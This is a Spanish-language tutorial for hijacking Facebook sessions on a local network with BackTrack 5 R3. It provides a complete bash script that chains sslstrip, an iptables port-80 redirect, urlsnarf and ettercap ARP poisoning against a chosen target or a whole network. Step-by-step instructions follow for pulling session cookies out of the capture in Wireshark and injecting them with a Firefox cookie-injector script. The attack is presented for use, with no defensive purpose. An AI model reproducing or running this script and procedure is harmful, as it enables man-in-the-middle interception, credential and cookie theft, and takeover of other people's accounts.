HIJACKING BT5R3
Antes de empezar instalamos los dos programas (complementos
firefox) que necesitamos antes de hacer el ataque con bt5r3.
http://userscripts.org/scripts/show/119798 (coockie injector script)
Y aca les dejo una Shell para poder configurar nuestro ataque
CODE
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
Como crear la Shell
Abrimos consola escribimos gedit para abrir el editor de
texto
Pegamos el código y lo guardamos con formato sh
Como configurar nuestra Shell
Ahora vemos que interface estamos usando, en mi caso es el
wlan0 con ip 192.168.1.7
Ejecutando Shell
Buscamos nuestra Shell creada y lo ejecutamos desde consola
y rellenamos los parámetros que necesitamos, si no es necesario rellenar un
parámetro solo hay que darle “enter/intro”
Cuando lleguemos al último parámetro “Target IP - LEAVE
BLANK IF YOU WANT TO ARP WHOLE NETWORK:” y le damos “enter/intro” esto es lo
que ocurrirá
Cuando lleve un buen rato trabajando el programa apretamos ctrl+c
y terminara el ataque mitm hecho por ettercap y abrirá el wireshark
ahora buscamos nuestra carpeta “logs” desde wireshark
búsqueda
ahora toca buscar la información que necesitamos en nuestra
barra de búsqueda ponemos http y le aceptamos, luego de eso dara la información
que reqerimos. Apretamos ctrl + F y nos aparecerá una patalla.y ponemos lo que
nos señalará la imagen y apretamos “find”
después de ponerle find este nos buscara el código que
necesitamos apretamos clic derecho en la información de la flecha roja y
pondremos copiar como sale en la imagen
ya tenemos nuestro código ahora solo falta ponernos en
facebook desde nuestro buscador apretar alt + c y pegar el código le damos “ok”
y nos aparecerá un mensaje “All Cookies Have Been Written” le dan “ok” luego recargan la pagina.
